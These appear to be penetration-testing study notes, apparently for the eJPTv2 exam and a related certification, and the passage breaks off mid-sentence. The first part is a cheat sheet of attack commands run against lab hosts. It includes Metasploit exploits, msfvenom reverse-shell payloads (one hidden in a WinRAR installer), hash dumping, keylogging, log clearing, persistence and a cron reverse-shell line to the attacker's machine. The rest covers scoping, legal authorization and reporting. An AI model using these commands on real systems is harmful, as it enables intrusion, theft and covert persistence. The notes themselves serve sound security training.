-sV -F -f <IP> // -f -> Fragment Packets SMB & NetBIOS Enumeration NetBIOS → API & a set of network protocol providing communication services over a local network. It is used primarily to allow applications on different computers to find & interact with each other on a network SMB → A network file sharing protocol that allows computers on a network to share files, printers, & other resources. > cat /etc/hosts > ping demo.ine.local // reachable IP1 > ping demo1.ine.local // not reachable IP2 > nmap demo.ine.local > nbtscan > whatis nbtscan > nbtscan <IP/Subnet> > nbtscan > nmblookup -A <IP1> > nmap -sU -p 137 <IP1> > nmap -sU -sV -p 137 -T4 --script=nbstat.nse -Pn -n <IP1> > nmap -sV -p 139,445 demo.ine.local > ls -la /usr/share/nmap/scripts/ | grep -e "smb-*" > nmap -p445 --script smb-protocols demo.ine.local > nmap -p445 --script smb-security-mode demo.ine.local > smbclient -L demo.ine.local // testing for anonymous access -> press enter > nmap -p445 --script smb-enum-users demo.ine.local > nano users.txt // enter all usernames > hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb > psexec.py administrator@demo.ine.local > whoami // MSF > search psexec > use exploit/windows/smb/psexec > set SMBUser <username> > set SMBPass <password> > set payload windows/x64/meterpreter/reverse_tcp > exploit > sysinfo > shell > ping <IP2> // Exit > run autoroute -s <IP2/Subnet> // /20 -> Meterpreter > background > seach socks > use auxiliary/server/socks_proxy > set VERSION 4a // cat /etc/proxychains4 > set SRVPORT <ProxychainPort> > run > netstat -antp // Machine 1 > proxychains nmap demo1.ine.local -sT -Pn -sV -p 445 // MSF > shell > net view <IP2> > background > migrate -N explorer.exe > shell > net view <IP2> > net use D: \\<IP2>\Documents > net use K: \\<IP2>\K$ > dir D: > SNMP Enumeration > cat /etc/hosts > nmap -sU -sV -p 161 demo.ine.local > ls -la /usr/share/nmap/scripts | grep -e "snmp-*" > ls -la /usr/share/nmap/nselib/data/ | grep snmp > nmap -sU -p 161 --script=snmp-brute demo.ine.local > snmpwalk -v 1 -c public demo.ine.local > nmap -sU -p 161 --script=snmp-* demo.ine.local > snmp_results // Enumerate users, etc. > hydra -l administrator -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb > SMB Relay Attack It is type of network attack where an attacker intercepts SMB traffic, manipulates it & relays it to a legitimate server to gain unauthorized access to resources or perform malicious actions > search smb_relay > use exploit/windows/smb/smb_relay > set SRVHOST <IP> // Kali Linux IP - ifconfig > set LHOST <IP> // Kali Linux IP - ifconfig > set SMBHOST <IP> // Check lab docs > // New Tab > echo "<Kali-IP> *.sportsfoo" > dns > dsnspoof -i eth1 -f dns > Metasploit MSFVenom x86 → 32 bit > msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe > msfvenom -a x64 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe > msfvenom --list formats > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f elf > payloadx86.elf // SHELLCODE // -i -> Iterations // -e -> Encoding // -x -> Inject in file // -k -> Keep original behavior of file (ex. winrar.exe) > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -e x86/shikata_ga_nai -f exe > encodedx86.exe > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > encodedx86.exe > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > encodedx86 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -x ~/Downloads/winrar601.exe > winrar.exe > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -k -x ~/Downloads/winrar601.exe > winrar.exe // MSF Scripts > msfconsole -r handler.rc > HTTP File Server (HFS) > db_nmap -sS -sV -O <IP> > search type:exploit name:rejetto > use exploit/windows/http/rejetto_hfs_exec > set RHOSTS <IP> > exploit // 32-bit session > set payload windows/x64/meterpreter/reverse_tcp > exploit // 64-bit session Apache Tomcat Java Server > setg RHOSTS <IP> > db_nmap -sS -sV -O <IP> > services > search type:exploit tomcat_jsp > use exploit/multi/http/tomcat_jsp_upload_bypass > set payload java/jsp_shell_bind_tcp > set LHOST & LPORT > set SHELL cmd > exploit > background the session > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali-IP> LPORT=1234 -f exe> meterpreter.exe > sudo python -m SimpleHTTPServer 80 > sessions 1 > certutil -urlcache -f http://<Kali-IP>/meterpreter.exe meterpreter.exe > dir // Continue > nano handler.rc > use multi/handler > set PAYLOAD windows/meterpreter/reverse_tcp > set LHOST <Kali-IP> > set LPORT 1234 > run > SAVE THE FILE > msfconsole -r handler.rc > .\meterpreter.exe // Resume after running handler.rc > sysinfo > getuid FTP Server > setg RHOSTS <IP> > db_nmap -sS -sV -O <IP> > services > analyze > search vsftpd > use exploit/unix/ftp/vsftpd+234_backdoor > exploit > background > sessions > search shell_to_meterpreter > use post/multi/manage/shell_to_meterpreter > set LHOST <kali-ip> > set LHOST eth1 > set SESSION <ID> > run > sessions 2 > sysinfo SAMBA : File Sharing Service > setg RHOSTS <IP> > db_nmap -sS -sV -O <IP> > search type:exploit name:samba > use exploit/linux/samba/is_known_pipename > check // check it it's vulnerable > run > ls / pwd > background > search shell_to_meterpreter > use post/multi/manage/shell_to_meterpreter > set LHOST eth1 > set SESSION <ID> > run > sessions 2 > sysinfo SSH > setg RHSOTS <IP> > db_nmap -sS -sV -O <IP> > search libssh_auth_bypass > use auxiliary/scanner/ssh/libssh_auth_bypass > set SPAWN_PTY true > run > session 1 > > background > search shell_to_meterpreter > use post/multi/manage/shell_to_meterpreter > set LHOST eth1 > set SESSION <ID> > run > sessions 2 SMTP > setg RHSOTS <IP> > db_nmap -sV -O <IP> > search type:exploit name:haraka > use exploit/linux/smtp/haraka > set SRVPORT 9898 > set email_to root@attackdefense.test > set payload linux/x64/meterpreter_reverse_http > set LHOST eth1 Meterpreter > edit flag1 // Text Editor > download flag1 > checksum md5 /bin/bash > getenv PATH > search -d /usr/bin -f *backdoor* > search -f *.jpg > search -f *.php > shell > ps // Runnning Processes > migrate <pid> > session -u 1 // Upgrade shell to Meterpreter session Windows Post Exploitation Modules > setg RHOSTS <IP> > db_nmap -sV <IP> > search rejetto > use exploit/windows/http/rejetto_hfs_exec > run > getsystem // elevate privileges > getuid > hashdump > show_mount > ps // list process > migrate <pid> > search win_privs > use post/windows/gather/win_privs > set SESSION <id> > run > search enum_logged > use post/windows/gather/enum_logged_on_users > set SESSION <id> > run > search checkvm > use post/windows/gather/checkvm > set SESSION <id> > run > search enum_applications > use post/windows/gather/enum_applications > set SESSION <id> > run > loot // Store results in DB > use post/windows/gather/windows_av_excluded > set SESSION 1 > run > search enum_computer > use post/windows/gather/enum_computers > search enum_patches > use post/windows/gather/enum_patches > use post/windows/gather/enum_shares > use post/windows/manage/enable_rdp > set SESSION <id> > run UAC Bypass > use exploit/windows/http/rejetto_hfs_exec > set payload windows/x64/meterpreter/reverse_tcp > set LHOST eth1 > exploit > sysinfo > getuid > getsystem > getprivs > shell > net users > net localgroup administrators > background > search bypassuac > use exploit/windows/local/bypassuac_injection > set payload windows/x64/meterpreter/reverse_tcp > set SESSION 1 > set LPORT 1234 > run > set TARGET Windows\ x64 > run > getsystem > hashdump Token Impersonation With Incognito > use exploit/windows/http/rejetto_hfs_exec > set payload windows/x64/meterpreter/reverse_tcp > set LHOST eth1 > exploit > sysinfo > getprivs > load incognito > list_tokens -u > impersonate_token "ATTACKDEFENSE\Administrator" > getuid > migrate <> > getuid Windows Persistence > use exploit/windows/http/rejetto_hfs_exec > set payload windows/x64/meterpreter/reverse_tcp > set LHOST eth1 > exploit > background > search platform:windows name:persistence > use exploit/windows/local/persistence_service > set payload windows/x64/meterpreter/reverse_tcp > set SESSION 1 > exploit > set payload windows/meterpreter/reverse_tcp > exploit > sysinfo > sessions -K > use multi/handler > set LHOST eth1 > run Enabling RDP > use exploit/windows/http/badblue_passthru > set RHOSTS > set target Badblue\ EE\ 2.7\ Universal > exploit > background > search enable_rdp > use post/windows/manage/enable_rdp > set SESSION 1 > exploit > db_nmap -sV -p 3389 <IP> > shell > net user administrator hacker_123321 // Change Password > xfreerdp /u:administrator /p:hacker_123321 /v:<IP> Windows Keylogging > use exploit/windows/http/badblue_passthru > exploit > pgrep explorer > migrate <ID> > keyscan_start > keyscan_dump Clearing Windows Event Logs > use exploit/windows/http/badblue_passthru > exploit > clearev // Deletes Event Logs Windows Pivoting > use exploit/windows/http/rejetto_hfs_exec > exploit > sysinfo > ipconfig // Copy the IP which is from same subnet : Victim 2 > run autoroute -s <IP>/<range> (Range-20) > background > use auxiliary/scanner/portscan/tcp > set RHOSTS <Victim2> > set PORTS 1-100 > exploit > sessions 1 > portfwd add -l 1234 -p 80 -r <Victim-2-Ip> > background > db_nmap -sS -sV -p 1234 localhost > use exploit/windows/http/badblue_passthru > set payload windows/meterpreter/bind_tcp > set RHOSTS <V-2-Ip> > set LPORT 4433 > exploit > sysinfo Linux Post Exploitation Post-Exploitation Modules > search samba > use exploit/linux/samba/is_known_pipename > set RHOSTS <IP> > exploit > pwd > background > sessions -u 1 > sessions 2 > sysinfo > getuid > shell > /bin/bash -i > whoami > uname -r > uname -a > ifconfig > ip a s > netstat -antp > ps aux > env > terminate > sessions -u 1 > search enum_configs > set SESSION <Meterpreter> > run > loot > serach env platform:linux > use post/multi/gather/env > set SESSION <id> > run > search enum_network > use post/linux/gather/enum_network > set SESSION <id> > run > search enum_protections > set SESSION <id> > run > notes > search enum_system > set SESSION <id> > run > serach checkcontainer > set SESSION <id> > run > search enum_users_history > set SESSION <id> > run Linux Privilege Escalation > setg RHOSTS <IP> > search ssh_login > use auxiliary/scanner/ssh/ssh_login > set USERNAME jackie > set PASSWORD password > exploit > sessions 1 > pwd > whoami > background > sessions -u 1 > sessions 2 > sysinfo > getuid > bash > ps aux > cat /bin/check-down > chkrootkit --help > chkrootkit -V > background > saerch chkrootkit > show options > set CHKROOKIT /bin/chkrootkit > set SESSION <mp-id> > set LHOST eth1 > exploit > /bin/bash -i Dumping Hashes with Hashdump > setg RHOSTS <IP> > use exploit/linux/samba/is_known_pipename > exploit > sessions -u 1 > sessions 2 > sysinfo > getuid > background > search hashdump > use post/linux/gather/hashdump > show options > set SESSION <id> > run > loot > sessions 3 > /bin/bash -i Establishing Persistence on Linux > use auxiliary/scanner/ssh/ssh_login > set USERNAME jackie > set PASSWORD password > exploit > sessions > sessions -u 1 > sessions 2 > search chkrootkit > set SESSION <id> > set CHKROOTKIT /bin/chkrootkit > set LHOSTS eth1 > set LPORT <> > exploit > sessions -u 3 > sessions 4 > getuid > shell > /bin/bash -i > useradd -m ftp -s /bin/bash > passwd ftp // enter: password123 > cat /etc/passwd > groups root > usermod -aG root ftp > groups ftp > usermod -u 15 ftp > cat /etc/passwd > search platform:linux persistence > use exploit/linux/local/cron_persistence > set SESSION 4 > set LPORT 4422 > set LHOST eth1 > exploit // fail > use exploit/linux/local/service_persistence > set SESSION 4 > set payload cmd/unix/reverse_python > set LPORT 4422 > exploit // fail > set target 4 > exploit // fail > use exploit/linux/local/sshkey_persistence > set CREATESSHFOLDER true > set SESSION 4 > exploit > loot > cat private_key.txt // use from loot > nano ssh_key // paste the key > chmod 0400 ssh_key > ssh -i ssh_key root@<target-ip> > Exploitation Banner Grabbing > nmap -sV -O <IP> > ls -la /usr/share/nmap/scripts | grep banner > nmap -sV --script=banner <IP> > nc <IP> <Port> Nmap Vulnerability Scanning > nmap -sV -O <IP> > ls -la /usr/share/nmap/scripts/ | grep http > nmap -sV --script=http-enum <IP> Post Exploitation Methodology Local Enumeration Transferring Files Upgrading Shells Privilege Escalation Persistence Dumping & Cracking Hashes Pivoting Clearing Tracks Windows Enum Users & Groups > use post/windows/gather/enum_logged_on_users > set SESSION 1 > run > shell > net user administrator > whoami /priv > route print > netstat -ano > netsh firewall show state > tasklist /SVC // Enumerate the list of running processes > show_mount > use post/windows/gather/win_privs > set SESSION 1 > run > use post/windows/gather/enum_applications > use post/windows/gather/enum_computers > use post/windows/gather/enum_patches Linux Enum > useradd bob -s /bin/bash > githum.com/rebootuser/LinEnum Windows Priv Escalation > PrivescCheck > search web_delivery > use exploit/multi/script/web_delivery > set TARGET PSH\ (Binary) > set payload windows/shell/reverse_tcp > set PSH-EncodedCommand false > set LHOST eth1 > exploit > copy & paste in windows cmd > whoami > background > use shell_to_meterpreter > set LHOST eth1 > set WIN_TRANSFER VBS > exploit Linux Priv Escalation // Exploiting Permissions > whoami > cat /etc/passwd > find / -not -type l -perm -o+w > cat /etc/shadow > openssl passwd -1 -salt abc password > nano /etc/shadow // Remove * & paste the hash > su // Exploiting SUDO Privs > cat /etc/passwd > sudo -l > sudo man cat > !/bin/bash Linux Persistence // Via SSH Keys > ssh student@<IP> // password:password > ls -la > cat wait > cd .ssh > cat id_rsa > cat authorized_key > scp student@<IP>:~/.ssh/id_rsa . // copy id_rsa locally > chmod 400 id_rsa > ssh student@<IP> // password:password > rm wait > ssh -i id_rsa student@<IP> // Via Cron Jobs > ssh student@<IP> // password:password > cat /etc/cron* > echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<kali-ip>/<port> 0>&1'" > cron > cat cron > crontab -i cron > crontab -l > rm wait > nc -nvlp 1234 >

Intro 48 Hour Exam 35 Questions Links https://medium.com/@ls5747670/my-ejptv2-experience-and-tips-2024-a91954726fc5 https://infosecwriteups.com/mastering-the-ejptv2-exam-ec38daec16bc https://aluvi.notion.site/eJPTv2-Complete-Cheat-sheet-d5b052c525d94c89b5d41183bd5c39fd https://cisofy.com/lynis/ https://github.com/xonoxitron/INE-eJPT-Certification-Exam-Notes-Cheat-Sheet https://github.com/Nater-aide/EJPT/blob/main/Notes/Wordpress.md https://github.com/miazga-git/eJPT-Study-Notes https://github.com/syselement/ine-notes/blob/main/ejpt/ejpt-cheatsheet.md https://github.com/Nater-aide/EJPT/blob/main/Notes/MYSQL.mdk

Chapter 1 Objective 1.1 Scope Definition Regulations, Frameworks, and Standards Privacy: Ensure compliance with privacy laws (e.g., GDPR, HIPAA). Notes Security: Adhere to security standards (e.g., ISO/IEC 27001, NIST). Notes Rules of Engagement Exclusions Define what systems, networks, or data are off-limits. Example: Exclude the production environment to avoid disruptions. Test Cases Specify the scenarios and conditions under which the testing will occur. Example: Testing for SQL injection vulnerabilities in the login module. Escalation Process Establish a protocol for addressing critical issues discovered during testing. Example: Immediate notification to the security team if a critical vulnerability is found. Testing Window Determine the timeframe for when testing will occur. Example: Conduct tests during off-peak hours to minimize business impact. Key Points: The timeline for the engagement and when testing can be conducted. What locations, systems, applications, or other potential targets are in scope. Types of tests that are allowed or disallowed. Data handling requirements for information gathered during the penetration test. What behaviors to expect from the target. What resources are committed to the test. Legal concerns. When and how communications will occur. Who to contact in case of particular events. Who is permitted to engage the pentest team. Agreement Types Non-Disclosure Agreement (NDA) → Legal documents that help enforce confiden- tial relationships between two parties. NDAs protect one or more parties in the relationship and typically outline the parties, what information should be considered confidential, how long the agreement lasts, when and how disclosure is acceptable, and how confidential information should be handled. Master Service Agreement (MSA) → Defines the terms that the organizations will use for future work. This makes ongoing engagements and SOWs much easier to work through, as the overall MSA is referred to in the SOW, prevent- ing the need to renegotiate terms. MSAs are common when organizations anticipate working together over a period of time or when a support contract is created. Statement of Work (SoW) → A document that defines the purpose of the work, what work will be done, what deliverables will be created, the timeline for the work to be completed, the price for the work, and any additional terms and conditions that cover the work. Alternatives to statements of work include statements of objectives (SOOs) and performance work statements (PWSs), both of which are used by the U.S. government. Terms of Service (ToS) → Defines the rules that users must agree to abide by to use a service. Ex. Conditions under which the penetration testing services will be rendered, including acceptable use policies. Target Selection Classless Inter-Domain Routing (CIDR) Ranges → Defines a range of IP addresses for network targeting. Example: The CIDR range 192.168.1.0/24 includes all IP addresses from 192.168.1.0 to 192.168.1.255. Domains Specifies domain names to be tested. Example: Testing example.com and its subdomains (sub.example.com). Internet Protocol (IP) Addresses Individual IP addresses selected for penetration testing. Example: Testing specific servers at 192.168.1.10 and 192.168.1.20. Uniform Resource Locator (URL) Specific web addresses within domains targeted for testing. Example: Testing the URL http://example.com/login for vulnerabilities. Assessment Types Web Focuses on identifying vulnerabilities in web applications and websites. Example: Testing for cross-site scripting (XSS) and SQL injection. Comparison: Web assessments often involve different tools and techniques than network assessments due to the nature of web technologies. Network Examines network infrastructure, including routers, switches, and firewalls, for security weaknesses. Example: Scanning for open ports, weak configurations, and vulnerabilities in network devices. Comparison: Network assessments are more focused on connectivity and data flow between systems, unlike web or mobile assessments. Mobile Targets vulnerabilities in mobile applications and devices. Example: Testing for insecure data storage, insufficient encryption, and insecure communication in a mobile app. Comparison: Mobile assessments require different skill sets and tools compared to web and network assessments due to the unique operating systems and application environments. Cloud Assesses security of cloud-based infrastructure, platforms, and services. Example: Evaluating the security of AWS, Azure, or Google Cloud configurations. Comparison: Cloud assessments involve understanding cloud-specific security practices and compliance requirements, different from on-premises assessments. Application Programming Interface (API) Examines the security of APIs, which facilitate communication between different software components. Example: Testing for insecure authentication, authorization, and input validation in APIs. Comparison: API assessments are specialized and focus on data exchange mechanisms, unlike general application assessments. Application Broad category encompassing the assessment of software applications, including desktop and enterprise applications. Example: Testing for buffer overflows, improper error handling, and insecure code practices. Comparison: Application assessments are broader and can include aspects of web, mobile, and API assessments. Wireless Focuses on the security of wireless networks, including Wi-Fi and Bluetooth. Example: Testing for weak encryption protocols (e.g., WEP), unauthorized access points, and insecure wireless configurations. Comparison: Wireless assessments require specific tools and techniques, such as Wi-Fi sniffers and signal analyzers, differing from wired network assessments. Shared Responsibility Model Hosting Provider Responsibilities Infrastructure Security: Ensuring the physical and foundational security of servers, storage, and networking components. Example: Data center security, hardware maintenance, and network security (e.g., DDoS protection). Compliance: Adhering to regulatory and industry standards. Example: Compliance with SOC 2, ISO 27001, or PCI-DSS for data protection and privacy. Customer Responsibilities Data Security: Protecting data within the cloud environment, including encryption and access controls. Example: Encrypting sensitive data stored in cloud databases. Configuration Management: Properly configuring cloud services and resources. Example: Setting up secure configurations for virtual machines and storage buckets to prevent unauthorized access. User Access Management: Managing user identities and access to resources. Example: Implementing multi-factor authentication (MFA) and least privilege access controls. Penetration Tester Responsibilities Testing Authorization: Obtaining necessary permissions to conduct penetration testing. Example: Securing formal approval from both the customer and hosting provider before initiating tests. Scope Adherence: Testing within the agreed-upon scope and respecting rules of engagement. Example: Only testing authorized systems and avoiding any non-approved systems or data. Vulnerability Reporting: Providing detailed reports on discovered vulnerabilities and recommendations for remediation. Example: Creating comprehensive reports with clear, actionable recommendations for improving security. Third-Party Responsibilities Service Integration Security: Ensuring the security of third-party services integrated into the customer’s environment. Example: Securely integrating third-party payment processors or authentication services. Compliance and Audits: Adhering to relevant compliance requirements and undergoing regular security audits. Example: Ensuring third-party vendors comply with GDPR or HIPAA regulations as required. Incident Response: Collaborating in incident response activities when security breaches involve third-party services. Example: Coordinating with third-party providers to quickly address and mitigate breaches. Legal and Ethical Considerations Authorization Letters Purpose: Formal documents granting permission to conduct penetration testing. Example: A written authorization from a company’s senior management allowing a pentester to test specific systems. Importance: Protects both the client and the tester legally, ensuring all parties are aware of the testing activities. Content: Should include scope, timeframe, and any limitations of the test. Example: An authorization letter specifying the systems to be tested, the methods to be used, and the duration of the testing period. Mandatory Reporting Requirements Legal Obligation: Certain vulnerabilities or breaches must be reported to relevant authorities or stakeholders. Example: Reporting discovered vulnerabilities to the organization’s security team and, if applicable, to regulatory bodies. Compliance: Adhering to industry standards and regulations that mandate reporting. Example: GDPR requires notifying authorities within 72 hours of discovering a data breach. Ethical Responsibility: Ensuring transparency and accountability by reporting findings that could impact stakeholders. Example: Reporting a critical vulnerability in a financial system that could lead to significant data loss or theft. Risk to the Penetration Tester Legal Risks: Potential legal consequences if testing is done without proper authorization. Example: Facing charges of unauthorized access or data tampering if tests are conducted without explicit permission. Physical Risks: Possible dangers when testing physical security controls or on-site systems. Example: Risk of injury when physically accessing and testing security of data centers or other secure facilities. Professional Risks: Reputation and career implications if testing is conducted unethically or results are mishandled. Example: Loss of credibility or job if a tester fails to disclose a significant vulnerability or mishandles sensitive information. Objective 1.2 Peer Review Purpose: Ensures accuracy and thoroughness of the penetration testing results through review by fellow security professionals. Example: A pentester’s report is reviewed by another team member for completeness and accuracy. Stakeholder Alignment Purpose: Ensures all relevant parties are informed and in agreement with the objectives and scope of the penetration test. Example: Regular meetings with IT, security teams, and management to align on testing goals and expectations. Importance: Facilitates a unified approach and understanding among stakeholders. Outcome: Cohesive and coordinated efforts towards improving security. Root Cause Analysis Purpose: Identifies the underlying reasons for discovered vulnerabilities or security issues. Example: Analyzing why a SQL injection vulnerability existed in an application’s code. Importance: Helps prevent recurrence by addressing the fundamental issues rather than just symptoms. Outcome: Implementation of long-term fixes and improvements in security practices. Escalation Path Purpose: Defines a clear process for escalating critical issues discovered during testing. Example: Immediate notification to senior management if a critical vulnerability is found. Importance: Ensures swift action and decision-making to address serious risks. Outcome: Timely and effective mitigation of critical vulnerabilities. Secure Distribution Purpose: Ensures sensitive findings and reports are shared securely with authorized personnel only. Example: Using encrypted emails or secure portals to share test results. Importance: Protects sensitive information from unauthorized access and potential misuse. Outcome: Maintains confidentiality and integrity of the findings. Articulation of Risk, Severity, and Impact Purpose: Clearly communicates the risks, severity, and potential impact of identified vulnerabilities. Example: Explaining the potential business impact of a critical vulnerability in layman’s terms to non-technical stakeholders. Importance: Helps stakeholders understand the urgency and significance of the findings. Outcome: Informed decision-making regarding remediation priorities and resource allocation. Goal Reprioritization Purpose: Adjusts testing and remediation goals based on new findings and evolving business needs. Example: Shifting focus to newly discovered critical vulnerabilities that pose immediate risks. Importance: Ensures resources are effectively utilized to address the most pressing security issues. Outcome: Dynamic and responsive approach to penetration testing and remediation. Business Impact Analysis Purpose: Assesses the potential impact of vulnerabilities on business operations. Example: Evaluating how a vulnerability could affect customer data and business continuity. Importance: Provides context for understanding the real-world implications of security issues. Outcome: Prioritized remediation efforts based on business risk. Client Acceptance Purpose: Obtains formal approval from the client for the findings, recommendations, and remediation plan. Example: Presenting the final report to the client and gaining their agreement on the next steps. Importance: Ensures client buy-in and commitment to implementing recommended security measures. Outcome: Successful collaboration and alignment on security improvements. Objective 1.3 Open Source Security Testing Methodology Manual (OSSTMM) Purpose: Provides a comprehensive methodology for security testing and analysis. A broad penetration testing methodology guide with information about analysis, metrics, workflows, human security, physical security, and wireless security. Unfortunately, it has not been updated since 2010, resulting in more modern techniques and technologies not being included in the manual. Council of Registered Ethical Security Testers (CREST) Purpose: Offers accreditation and certification for organizations and individuals in the security testing industry. Key Features: Sets professional standards for security testing and provides guidelines and certifications. Penetration Testing Execution Standard (PTES) Purpose: Provides a detailed framework for performing penetration testing. Key Features: Covers seven phases: Pre-engagement Interactions, Intelligence Gathering, Threat Modeling, Vulnerability Analysis, Exploitation, Post-Exploitation, and Reporting. It ranges from pre-engagement interactions like scoping and questions to ask clients, to details such as how to deal with third parties. It also includes a full range of penetration testing techniques and concepts, making it one of the most complete and modern openly available penetration testing standards. MITRE ATT&CK Notes OWASP Top 10 Purpose: Lists the top 10 most critical web application security risks. Key Features: Focuses on prevalent and severe web application vulnerabilities like SQL injection, XSS, and more. OWASP Mobile Application Security Verification Standard (MASVS) Purpose: Provides a framework for securing mobile applications. Key Features: Defines security requirements and verification levels for mobile app security. Purdue Model Purpose: A reference model for industrial control systems (ICS) security. Key Features: Divides ICS networks into different levels, each with specific security considerations. The Purdue Model, also known as the Purdue Enterprise Reference Architecture (PERA), is a widely accepted framework used to segment and secure Industrial Control Systems (ICS) environments. It organizes the ICS architecture into multiple layers, each with specific roles and security requirements. This model helps in understanding how to effectively secure and manage different components of an ICS network. Layers of the Purdue Model Level 0: Physical Process Description: The actual physical processes and machinery, including sensors, actuators, and other devices that interact directly with the physical environment. Examples: Sensors measuring temperature, pressure, or flow rates. Actuators controlling valves, motors, or pumps. Level 1: Basic Control Description: The control devices that directly manage Level 0 equipment, often referred to as programmable logic controllers (PLCs) or remote terminal units (RTUs). Examples: PLCs and RTUs executing control logic to automate processes. Human-Machine Interfaces (HMIs) at the local control level. Level 2: Supervisory Control Description: Systems that provide supervisory control and data acquisition (SCADA) functions, aggregating data from Level 1 and providing oversight and control. Examples: SCADA systems for real-time monitoring and control. HMIs at the supervisory control level. Level 3: Operations Management Description: Systems used for production control, including batch management, production scheduling, and other operational functions. Examples: Manufacturing Execution Systems (MES) managing production workflows. Systems for coordinating production processes and ensuring quality control. Level 4: Enterprise Systems Description: Enterprise-level systems that manage business logistics, planning, and enterprise resource management. Examples: Enterprise Resource Planning (ERP) systems. Customer Relationship Management (CRM) systems. Level 5: External Networks Description: Connections to external networks, including business partners, suppliers, and the internet. Examples: Connections to corporate networks. External cloud services. Threat Modeling Frameworks DREAD (Damage potential, Reproducibility, Exploitability, Affected users, Discoverability) Purpose: Provides a quantitative assessment of threat severity. Components: Damage Potential: Measures the potential impact of a threat. Example: High damage potential for a vulnerability that allows full system takeover. Reproducibility: Assesses how easily the threat can be reproduced. Example: A threat that can be reproduced consistently scores high. Exploitability: Evaluates how easy it is to exploit the threat. Example: A threat that requires minimal technical skill to exploit scores high. Affected Users: Estimates the number of users impacted by the threat. Example: A vulnerability affecting all users of an application scores high. Discoverability: Measures how likely the threat is to be discovered. Example: A vulnerability visible in public-facing code scores high. Usage: Helps prioritize threats based on their overall risk score. STRIDE (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege) Purpose: Identifies potential threats by categorizing them into six types. Components: Spoofing: Impersonation of a user or device. Example: Unauthorized access using stolen credentials. Tampering: Unauthorized alteration of data. Example: Modifying transaction details in a database. Repudiation: Denying an action or transaction without proof. Example: A user denying the submission of a malicious request. Information Disclosure: Unauthorized exposure of information. Example: Data leakage through unsecured channels. Denial of Service (DoS): Disruption of service availability. Example: Overloading a server to prevent legitimate access. Elevation of Privilege: Gaining unauthorized higher-level access. Example: Exploiting a vulnerability to gain admin rights. Usage: Provides a structured approach to identify and categorize threats during system design and analysis. OCTAVE (Operationally Critical Threat, Asset, and Vulnerability Evaluation) Purpose: Focuses on organizational risk management and strategic assessment. Components: Identifying Critical Assets: Recognize and prioritize key organizational assets. Example: Identifying customer data and intellectual property as critical assets. Threat Profiling: Determine potential threats to each critical asset. Example: Profiling threats such as cyber-attacks, insider threats, and natural disasters. Vulnerability Assessment: Identify vulnerabilities that can be exploited by threats. Example: Assessing systems for software bugs, misconfigurations, and weak access controls. Risk Mitigation Planning: Develop strategies to mitigate identified risks. Example: Implementing security controls and response plans for identified vulnerabilities. Usage: Provides a comprehensive approach for assessing and managing risks at an organizational level. Objective 1.4 Format Alignment Purpose: Ensures consistency and clarity in report presentation. Example: Using a standard template with predefined sections, headings, and formatting styles. Importance: Enhances readability and professionalism, making it easier for stakeholders to understand and act on the findings. Documentation Specifications Purpose: Establishes detailed guidelines for documenting the penetration test. Example: Specifying the format for capturing screenshots, logs, and evidence of findings. Importance: Ensures comprehensive and clear documentation that can be easily reviewed and referenced. Risk Scoring Purpose: Provides a quantifiable measure of the risk associated with identified vulnerabilities. Example: Using a scoring system like CVSS (Common Vulnerability Scoring System) to rate the severity of each vulnerability. Importance: Helps prioritize remediation efforts based on the risk level. Definitions Purpose: Clarifies terminology and concepts used in the report. Example: Defining terms like “exploit,” “vulnerability,” “risk,” and “threat.” Importance: Ensures all stakeholders have a common understanding of the terms used in the report. Report Components Executive Summary Purpose: Provides a high-level overview of the test findings and recommendations. Example: Summarizing key vulnerabilities, overall risk level, and major recommendations. Importance: Allows executives and non-technical stakeholders to grasp the essential outcomes and actions needed. Methodology Purpose: Describes the testing approach and techniques used. Example: Detailing the phases of the test, tools used, and the scope of testing. Importance: Ensures transparency and reproducibility of the test. Detailed Findings Purpose: Provides an in-depth description of each identified vulnerability. Example: Including vulnerability description, evidence, risk rating, and potential impact. Importance: Offers detailed insights for technical teams to understand and address the issues. Attack Narrative Purpose: Describes the steps taken to exploit vulnerabilities in a narrative format. Example: Detailing the sequence of actions taken to compromise a system and the outcomes. Importance: Illustrates the practical impact of vulnerabilities and the effectiveness of defenses. Recommendations Purpose: Offers guidance on how to remediate identified vulnerabilities. Example: Providing specific remediation steps, configuration changes, or patches needed. Importance: Provides actionable steps to mitigate risks and improve security posture. Remediation Guidance: Specific instructions for fixing the identified vulnerabilities. Test Limitations and Assumptions Purpose: Clarifies the scope limitations and assumptions made during testing. Example: Noting any areas not tested, assumptions about network configurations, or system states. Importance: Sets realistic expectations about the coverage and accuracy of the test results. Reporting Considerations Legal Purpose: Ensures the report complies with legal requirements and protects the interests of all parties. Example: Including disclaimers about the use of the report and confidentiality agreements. Importance: Avoids legal liabilities and ensures proper use of the report. Ethical Purpose: Adheres to ethical standards in reporting and handling findings. Example: Ensuring responsible disclosure of vulnerabilities and protecting sensitive information. Importance: Maintains professional integrity and trustworthiness. Quality Control (QC) Purpose: Ensures accuracy and completeness of the report through thorough review. Example: Peer reviewing the report and verifying all findings and recommendations. Importance: Enhances the reliability and credibility of the report. Artificial Intelligence (AI) Purpose: Utilizes AI tools to enhance the report’s insights and accuracy. Example: Using AI to analyze patterns, detect anomalies, or automate parts of the reporting process. Importance: Improves the efficiency and depth of analysis in the report. Objective 1.5 Technical Controls System Hardening: Secures system configurations to reduce vulnerabilities. Sanitize User Input/Parameterize Queries: Prevents injection attacks by properly handling inputs. Multifactor Authentication (MFA): Adds layers of verification to enhance access security. Encryption: Protects data confidentiality by 